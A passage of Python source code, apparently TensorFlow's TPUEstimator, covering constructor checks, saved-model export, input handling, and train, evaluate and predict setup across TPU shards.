ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in
(tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 is supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and
isinstance(cluster, tpu_cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = array_ops.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[constant_op.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = array_ops.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[constant_op.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = array_ops.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[constant_op.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
